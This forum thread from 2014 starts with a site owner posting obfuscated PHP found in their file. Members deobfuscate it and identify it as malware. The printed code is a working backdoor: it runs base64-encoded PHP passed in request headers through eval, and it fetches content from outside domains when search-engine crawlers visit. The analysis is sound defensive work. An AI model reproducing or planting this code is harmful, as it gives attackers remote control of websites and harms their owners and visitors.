1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Is it virus or just a simple php function?

Discussion in 'PHP' started by Jaden Alvin, Apr 18, 2014.

0
  1. #1
    Hi

    I need help today i have seen a strange code in my php file while making changes. Site working fine but i'm worried that this may be virus or not? Help with this.

    <?php                                                                                                                                                                 /*versio:2.17*/$IllI=0;if (!function_exists('I111I1ll')){$GLOBALS['IllI'] = '=Y3VybAX2luaXQYWxsb3dfdXJsX2ZvcGVuX$O%DMQ{S?mPDaHR0cDovLwJndheT1maWxlX2dldF9jb250ZW50cw}DX3NldG9wdAGediX2V4ZWMJndheT1jdXJsoYYSLwjb3Nvbi5pbg!EYS1pbi1hLWNpcmNsZS5jb20XJkcGhwYWlkZS5jb20dwWWWV8@}OgLZGlzcGxheV9lcnJvcnMSZGV0ZXJtaW5hdG9yUp^ZnRwMTMAMi4xNw~ebUVFPMDBRT08LYmFzZTY0X2RlY29kZQ}RAYmFzZTY0X2VuY29kZQwSFRUUF9IT1NU{dW5pb24c2VsZWN0MvnUkVRVUVTVF9VUkkbU0NSSVBUX05BTUUVUVVFUllfU1RSSU5HsPHwj_PwoKVE1QG BVEVNUARVE1QRElSWRdG1wE)ld3AtY29udGVudC91cGxvYWRzLL.d3AtY29udGVudC9jYWNoZQdXBsb2FkX3RtcF9kaXIxL3RtcA(LgRodmVyc2lv_?kLQthLXBocAlbVSFRUUF9FWEVDUEhQb3V0b2swOSFRUUF9VU0VSX0FHRU5UGIwQLAZ29vZ2xlLHlhaG9vLGJpbmcsbXNuLGFzayxiYWlkdSxjcmF3bGVyLHlhbmRleA~d;L3BnLnBocD91PQbJms9JnQ9cGhwJnA9Z$JnY9HEZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5VlYzMXZva2dZL3lwVDB6U1FzQnlENE10NlhEUzdka3ZTMDJydEpwdXVJUzRPTFZrRWczamRwdkc3My9QTUREQlcycjNUUDhSNTN0OSs4eEJIUkR0YnN5aE8yVnByclZuQjhrMmNyb29zYituNkM0bjJhVmpFV1VwVVNoQ3hMTkxPWjlac2FzME1jbkUrbStLSGVHUnlkMzJ0a3hkU24yemlNTStLZU1PMEl0OHpmVUJ5VnV6emxLZ3E0UFJRVzNwZ1JSUW5URHYzZlpva3ZnSEtac0JuZ1RmblBoejRDYWoxS2FWSTFxaEJPaUFQekhnRUZNbGpWaHhkZzNTQll4aW5jYkJqaFZhTE9nYXhMZDBnRk1neDVJR3pQRFN3Nk1SVFRMYjdjS2p6TVAyRUpqNzFodWd3U2daaGxoWXNMWGExQ2dmc1Uwc25KcEVCNFpPSXlLeDF1c0RWQmtOVmZxUnF6QXhMZGd6ZEt6TVVzRi94RGt6SW1MRk1vTkN5cGpNSWZ5aFBOWkVVK2taU2VuM3UxUUFyWlVFUm1uaW8xWmFwazRvMGFjWWduKzdtMTlPYlJRQS9Cdm1mb1ZKcUFadXR2NnY0YWp6NlBKNGIwUXBpZjVkeFBsN2N6U2VMK1doeWV3a0Nzc25lNXY4MG5VekdueFlMLysveDlHNWhFSmZuQ1gzemVmWkVPa281VkJYdTh5UUlrMnpIbEZPc0I5dHNpMmROQ2tNVmFqVjFyTFpyRUVqem9TNHI1eW5MeWtlRnp3QWFqM1paK0RQYnNyVHUvWjVsQ0k0WlB1QmhrZ2luMFlOeWZzVEV3WjlaazNGeVBKOFFVclRkWS8rVUE5ejZNbDZRRjFtcHc4WFQ2dGxEVDFoQnJoYUxteitvYVgzUHY2ZFgyYTc0Q0d6Q3RRTWV0Ymp5bVNYOHY3bTZDYWEzU3YvWUhSd1VFOCsvanVlMy9uVFNZUHR1eC9JUG93Y1ltby9jQjFUR2xaY0duaDRSRGM3ZUFTQVpuMDR1TG9qMkNuREloNXI4SjNoVFo4ckVqTVBNS3M1UXU4ZXhhQmlWOVM3eENaNm1Ja3IyYTV0a2E2YTFLaCtOVWlYdzdWT0VHTWw5YnkzcmdZNDNUWEtjajl2RUwzWWZkQmhZR2VYNTZsbkJJVnZNcXpKczFBSG9zOXRIUngwY1FCY25xMExUcHp3dUdHL1NoUG9HL09JVFpFRzJ6eFNLRHZBbG0wNHcxZnA2TmtjNllCOUdVcEVRcVJRTjFGd2hSY1pTMmMvMkJSUmNRM0FCZEJHMWdoQkJKUXNmTThYM0hqUkxXemNsbzlKRmZjcTdTQXFhUEg4dFhxVlRSTzhEWHRPK0x0cGUzR28xMVVZMHB4MEorS0tQRTY4bXR5WGNnUXNJaFFyRnFXNFp6SkFxNHlLV1VkRWdVTXVaUXVwQThtaFA2SU9SVjZWNjdZckVoOGw3RGFFVnhmUjJSVjVrU2ZiRWNtMTRIdHlPNXpCSzkvVmRaTmtjVExIUm9peG5xL0FSNmhyZ1FLOTJSQ2JUKzZ2T090WWRWRzR6Ykh0K1dOZTdUVjNNQUVJWmFyaVg0a3V2QWMvS1MrbE5YVFk0MXZ0dnVnN2dsWFlXNy9qb25JYUlkWUd1WG9vcjkyMDZ4KzlUc3RNWFpJVE14aFIyWE40V3k5K3BOOVVkb05mRnJvUUw3ajJOWWhiRXFDR1VUTDJ5ckUxU1Zad0NvK0RyRFRkcnQ3d01UTm1YcHNSWjJZeGxnMEVycitNOFhRSHdCY0dsZnowT0F0Mzg3TS9oc3B2T3Y0RzFtOUY4QkkrOHRhQVd0RUtaeGhCdzZoeDlhVFFUZXpnUGdqaWVmSDFEN0lqaVdDNzJRNk5NcVUzR1VjKytndzNwNkUwVWJDKzdtWVFGdDIwZ25lNXpUcGR5Z0ZCUjArbno2VGJJMFFqSkhQRWhncnhUWDg3T1dYbnJpME8rbFBKSDAydE10dGdyZHdIQzUrcUhXR3RyU2U0NjM3MzQ0WUQ4QVBzL3ErdWcyR3k5MC9nd1h3SVE4U3ROVkZWcTRaMGRmQXRHZDR1cjF0THpKRnNKdUNWOERpVXcxeHVveFFmV0tPR3ZOdWpTdGpBb0VGTWxkREZ6MVRLQ3Qrek1rMGpZTkdvdWJnUjgxUEJLWWYrc2tsSUtkUHpHUGNjV3JhQ2M4QnVEWHppd0VSZWF4Ui9MaEl0M0NNZ2d0MVZrKy9CUi9PV3ZBbUd5WDdNZ1MwTldIZ3BJRTZzMFR1b1ExajZXaG5obHl5TXhhZmhCcEhrZmwxMlg4amVISTF3dVZ3ZGw2M2N4czJwUVhVd3B2bDJJemxOdTZ4SnBoUXRHUlQzenZFdStKZ3MyTlZUeFpvQmJuYm9YZGpDVjFNRU80bkhWQmUzZ2E0aFR0WlpDNkZCK3paejJRS2ZyQ2hIUk5RTzVwT0lXWEwzSWlhMEd0cUg2WFc3d3FpU0g0ODZINzc4N2xmTmEiKSkpOwcHJlZ19yZXBsYWNl';function I111I1ll($a, $b){$c=$GLOBALS['IllI']; $d=pack('H*','6261736'.'536345f6465636f6465'); return $d(substr($c, $a, $b));};$IIII1l1I1 = I111I1ll(3239, 16);$IIII1l1I1("/IllI1lI11/e", I111I1ll(681, 2558), "IllI1lI11");};?>
    PHP:
    Thanks​
     
    Jaden Alvin, Apr 18, 2014 IP
  2. HackTactics

    HackTactics Member

    Messages:
    16
    Likes Received:
    9
    Best Answers:
    1
    Trophy Points:
    38
    #2
    Very Interesting find, I'm this far into decoding it:
    
<?php
if(!defined("determinator")){
    function determinator_feof($Q0QO0Q, &$QOOOOO = NULL){
        $QOOOOO = microtime(true);
        return feof($Q0QO0Q);
    }
   
    function getfile($II1llI, $QQQ0Q0){
        $IllIIl = I111I1ll(1, 6);
        $III111 = $IllIIl.I111I1ll(7, 7);
        @ini_set(I111I1ll(14, 20), 1);

        if (@ini_get(I111I1ll(14, 20)) == I111I1ll(39, 2)){
            $Il1lI1=@file_get_contents(I111I1ll(47, 10) . $II1llI . $QQQ0Q0. I111I1ll(57, 30));
            return $Il1lI1;
        } elseif (function_exists($III111)){
            $QQ00OQ = @$III111();
            $II1111 = $IllIIl.I111I1ll(89, 10);
            $QO00QO = $IllIIl.I111I1ll(103, 7);
            @$II1111($QQ00OQ, CURLOPT_URL, I111I1ll(47, 10) . $II1llI . $QQQ0Q0. I111I1ll(110, 12));
            @$II1111($QQ00OQ, CURLOPT_HEADER,false); @$II1111($QQ00OQ, CURLOPT_RETURNTRANSFER,true);
            @$II1111($QQ00OQ, CURLOPT_CONNECTTIMEOUT, 5);
            $I111II = @$QO00QO($QQ00OQ);
            @curl_close($QQ00OQ);
            if (empty($I111II)){
                $I111II = I111I1ll(125, 0);
            } 
            return $I111II;
        } else {
            $Q0QO0Q = @fsockopen($II1llI, 80, $Q0QOQ0, $I1llll, 5);
            if ($Q0QO0Q){ 
                $QOQ0QQ = I111I1ll(125, 0);
                $QOOOOO = NULL;
                @fputs($Q0QO0Q, "GET {$QQQ0Q0}&way=socket HTTP/1.0\r\nHost: {$II1llI}\r\n");
                $QQ0O0Q = PHP_OS.I111I1ll(126, 2).PHP_VERSION;
                @fputs($Q0QO0Q, "User-Agent: {$QQ0O0Q}\r\n\r\n");
                while(!determinator_feof($Q0QO0Q, $QOOOOO) && (microtime(true) - $QOOOOO) < 2){
                    $QOQ0QQ .= @fgets($Q0QO0Q, 128);
                } 
                @fclose($Q0QO0Q);
                $Q0OO0Q = explode("\r\n\r\n", $QOQ0QQ);
                unset($Q0OO0Q[0]);
                return implode("\r\n\r\n", $Q0OO0Q);
            } 
        }
    } 
    $QO0Q00 = Array(I111I1ll(129, 10), I111I1ll(141, 23), I111I1ll(167, 15));

    function write($I11l1I,$I1I11l){
        if ($Q0OQQQ=@fopen($I11l1I,I111I1ll(182, 2))){
            @fwrite($Q0OQQQ,$I1I11l);
            @fclose($Q0OQQQ);
        }
    }

    function output($IlllII, $QOOQ00){
        echo I111I1ll(186, 3).$IlllII.I111I1ll(191, 2).$QOOQ00."\r\n"; 
    }

    @ini_set(I111I1ll(194, 19), 0); 
   
    define(I111I1ll(214, 16), 1);

    $II1lll=I111I1ll(233, 7);
    $IlIllI=I111I1ll(241, 6);
    $I11l1l=I111I1ll(250, 11);
    $Q00OOQ=I111I1ll(262, 18);
    $Il1IIl=I111I1ll(283, 18);
    $II1llI=I111I1ll(47, 10);
    $II1llI.=strtolower(@$_SERVER[I111I1ll(302, 12)]);

    foreach ($_GET as $IlllII=>$QOOQ00){
        if (strpos($QOOQ00,I111I1ll(315, 7))){
            $_GET[$IlllII]=I111I1ll(125, 0);
        } elseif (strpos($QOOQ00,I111I1ll(322, 8))){
            $_GET[$IlllII]=I111I1ll(125, 0);
        } 
    } 
   
    if(!isset($_SERVER[I111I1ll(333, 15)])) {
        $_SERVER[I111I1ll(333, 15)] = @$_SERVER[I111I1ll(349, 15)];
        if(@$_SERVER[I111I1ll(365, 16)]) {
            $_SERVER[I111I1ll(333, 15)] .= I111I1ll(387, 2) . @$_SERVER[I111I1ll(365, 16)];
        }
    }

    if ($QQ0QOO=$II1llI.@$_SERVER[I111I1ll(333, 15)]){ 
        $QOQOQO=@md5($II1llI.$IlIllI.PHP_OS.$I11l1l);
        $Il1Ill=dirname(__FILE__).DIRECTORY_SEPARATOR;
        $IIlll1 = Array( @$_SERVER[I111I1ll(391, 4)], @$_SERVER[I111I1ll(398, 6)], @$_ENV[I111I1ll(391, 4)], @$_ENV[I111I1ll(405, 8)], @$_ENV[I111I1ll(398, 6)], $Il1Ill.I111I1ll(415, 4), $Il1Ill.I111I1ll(422, 24), $Il1Ill.I111I1ll(449, 22), @ini_get(I111I1ll(471, 19)), I111I1ll(491, 6), );

        foreach ($IIlll1 as $IIlI1I){
            if (!empty($IIlI1I)){
                $IIlI1I.=DIRECTORY_SEPARATOR;
                if (@is_writable($IIlI1I)){
                    $Il1Ill = $IIlI1I;
                    break;
                }
            }
        }

        $tmp=$Il1Ill.I111I1ll(498, 2).$QOQOQO;
        if (@$_SERVER["HTTP_Y_AUTH"]==$QOQOQO){
        echo "\r\n"; @output(I111I1ll(502, 8), $IlIllI.I111I1ll(513, 2).$II1lll.I111I1ll(517, 6));

        if ($QOOOOQ=$Q00OOQ(@$_SERVER[I111I1ll(526, 16)])){
            @eval($QOOOOQ);
            echo "\r\n"; @output(I111I1ll(542, 4), I111I1ll(546, 3));
        } 
       
        exit(0);
    } 
   
    if (@is_file($tmp)){
        @touch($tmp);
        @include_once($tmp);
    } else{

    $QQ0QOO=@urlencode($QQ0QOO);
    $Illlll = @strtolower(@$_SERVER[I111I1ll(551, 20)]);
    foreach (explode(I111I1ll(575, 2), I111I1ll(577, 62)) as $III11l){
        if (strpos($Illlll, $III11l)!==False){
            if (@touch($tmp)){ 
                $QQQ0Q0 = I111I1ll(642, 14).$QQ0QOO.I111I1ll(657, 4).$QOQOQO.I111I1ll(661, 12).$II1lll.I111I1ll(675, 4).$IlIllI;
                $I1lllI = getfile($QO0Q00[0], $QQQ0Q0);
                @touch($tmp);
            }
            break;
        } 
    }
} } }
?>
    PHP:
     
    Last edited: Apr 18, 2014
    HackTactics, Apr 18, 2014 IP
    Vooler likes this.
  3. HackTactics

    HackTactics Member

    Messages:
    16
    Likes Received:
    9
    Best Answers:
    1
    Trophy Points:
    38
    #3
    Which translates to:
    <?php
if(!defined("determinator")){
    function determinator_feof($Q0QO0Q, &$QOOOOO = NULL){
        $QOOOOO = microtime(true);
        return feof($Q0QO0Q);
    }
   
    function getfile($II1llI, $QQQ0Q0){
        $IllIIl = curl_init;
        @ini_set("allow_url_fopen", 1);

        if (@ini_get("allow_url_fopen") == 1){
            $Il1lI1=@file_get_contents("http://" . $II1llI . $QQQ0Q0. "&way=file_get_contents");
            return $Il1lI1;
        } elseif (function_exists($III111)){
            $QQ00OQ = @$III111();
            $II1111 = $IllIIl."_setopt";
            $QO00QO = $IllIIl."_exec";
            @$II1111($QQ00OQ, CURLOPT_URL, "http://" . $II1llI . $QQQ0Q0. "&way=curl");
            @$II1111($QQ00OQ, CURLOPT_HEADER,false); @$II1111($QQ00OQ, CURLOPT_RETURNTRANSFER,true);
            @$II1111($QQ00OQ, CURLOPT_CONNECTTIMEOUT, 5);
            $I111II = @$QO00QO($QQ00OQ);
            @curl_close($QQ00OQ);
            if (empty($I111II)){
                $I111II = "";
            }
            return $I111II;
        } else {
            $Q0QO0Q = @fsockopen($II1llI, 80, $Q0QOQ0, $I1llll, 5);
            if ($Q0QO0Q){
                $QOQ0QQ = "";
                $QOOOOO = NULL;
                @fputs($Q0QO0Q, "GET {$QQQ0Q0}&way=socket HTTP/1.0\r\nHost: {$II1llI}\r\n");
                $QQ0O0Q = PHP_OS."/".PHP_VERSION;
                @fputs($Q0QO0Q, "User-Agent: {$QQ0O0Q}\r\n\r\n");
                while(!determinator_feof($Q0QO0Q, $QOOOOO) && (microtime(true) - $QOOOOO) < 2){
                    $QOQ0QQ .= @fgets($Q0QO0Q, 128);
                }
                @fclose($Q0QO0Q);
                $Q0OO0Q = explode("\r\n\r\n", $QOQ0QQ);
                unset($Q0OO0Q[0]);
                return implode("\r\n\r\n", $Q0OO0Q);
            }
        }
    }
    $QO0Q00 = Array("oson.in", "a-in-a-circle.com", "phpaide.com");

    function write($I11l1I,$I1I11l){
        if ($Q0OQQQ=@fopen($I11l1I,"w")){
            @fwrite($Q0OQQQ,$I1I11l);
            @fclose($Q0OQQQ);
        }
    }

    function output($IlllII, $QOOQ00){
        echo "Y_".$IlllII.":".$QOOQ00."\r\n";
    }

    @ini_set("display_errors", 0);
   
    define("determinator", 1);

    $II1lll="ftp13";
    $IlIllI="2.17";
    $I11l1l="QQO00QOO";
    $Q00OOQ="base64_decode";
    $Il1IIl="base64_encode";
    $II1llI="http://";
    $II1llI.=strtolower(@$_SERVER["HTTP_HOST"]);

    foreach ($_GET as $IlllII=>$QOOQ00){
        if (strpos($QOOQ00,"union")){
            $_GET[$IlllII]="";
        } elseif (strpos($QOOQ00,"select")){
            $_GET[$IlllII]="";
        }
    }
   
    if(!isset($_SERVER["REQUEST_URI"])) {
        $_SERVER["REQUEST_URI"] = @$_SERVER["SCRIPT_NAME"];
        if(@$_SERVER["QUERY_STRING"]) {
            $_SERVER["REQUEST_URI"] .= "?" . @$_SERVER["QUERY_STRING"];
        }
    }

    if ($QQ0QOO=$II1llI.@$_SERVER["REQUEST_URI"]){
        $QOQOQO=@md5($II1llI.$IlIllI.PHP_OS.$I11l1l);
        $Il1Ill=dirname(__FILE__).DIRECTORY_SEPARATOR;
        $IIlll1 = Array( @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], $Il1Ill."tmp", $Il1Ill."wp-content/uploads", $Il1Ill."wp-content/cache", @ini_get("upload_tmp_dir"), "/tmp", );

        foreach ($IIlll1 as $IIlI1I){
            if (!empty($IIlI1I)){
                $IIlI1I.=DIRECTORY_SEPARATOR;
                if (@is_writable($IIlI1I)){
                    $Il1Ill = $IIlI1I;
                    break;
                }
            }
        }

        $tmp=$Il1Ill.".".$QOQOQO;
        if (@$_SERVER["HTTP_Y_AUTH"]==$QOQOQO){
        echo "\r\n"; @output("versio", $IlIllI."-".$II1lll."-php");

        if ($QOOOOQ=$Q00OOQ(@$_SERVER["HTTP_EXECPHP"])){
            @eval($QOOOOQ);
            echo "\r\n"; @output("out", "ok");
        }
       
        exit(0);
    }
   
    if (@is_file($tmp)){
        @touch($tmp);
        @include_once($tmp);
    } else{

    $QQ0QOO=@urlencode($QQ0QOO);
    $Illlll = @strtolower(@$_SERVER["HTTP_USER_AGENT"]);
    foreach (explode(",", "google,yahoo,bing,msn,ask,baidu,crawler,yandex") as $III11l){
        if (strpos($Illlll, $III11l)!==False){
            if (@touch($tmp)){
                $QQQ0Q0 = "/pg.php?u=".$QQ0QOO."&k=".$QOQOQO."&t=php&p=".$II1lll."&v=".$IlIllI;
                $I1lllI = getfile($QO0Q00[0], $QQQ0Q0);
                @touch($tmp);
            }
            break;
        }
    }
} } }
?>
    PHP:
    I am still trying to figure out what it does, it looks malicious, I'd remove it.
     
    HackTactics, Apr 18, 2014 IP
    sarahk likes this.
  4. superprg

    superprg Well-Known Member

    Messages:
    292
    Likes Received:
    49
    Best Answers:
    0
    Trophy Points:
    120
    #4
    Is this in the WordPress code?
    yes its malicious code. Please remove it ASAP
    Search for "defined("determinator")" in google and you would get more details about it
     
    superprg, Apr 18, 2014 IP
  5. HackTactics

    HackTactics Member

    Messages:
    16
    Likes Received:
    9
    Best Answers:
    1
    Trophy Points:
    38
    #5
    That said, it must be old as "oson.in" is no longer an owned domain, so it was malicious code, but still remove it
     
    HackTactics, Apr 18, 2014 IP
  6. VegasHOOkUp

    VegasHOOkUp Peon

    Messages:
    7
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    3
    #6
    Rule of thumb! -- If a code is not readable to a coder.... or look malicious... * rm -rf * remove the code!
    It's better to be safe than sorry
     
    VegasHOOkUp, Apr 19, 2014 IP
    sarahk likes this.
  7. shavic

    shavic Greenhorn

    Messages:
    18
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    11
    #7
    Remove it ASAP. You never know what it could harm.
     
    shavic, Apr 22, 2014 IP
  8. GuiltyCrown

    GuiltyCrown Peon

    Messages:
    19
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    1
    #8
    Its usually code added automatically to some pages, happened to me in the past as well. Will lead to google marking your website as spam and when someone clicks your link google will warn them there might be viruses on your website.

    It seems to be using sockets so its definetily calling some other page and maybe downloading or sending confidential data to them..
     
    GuiltyCrown, Apr 23, 2014 IP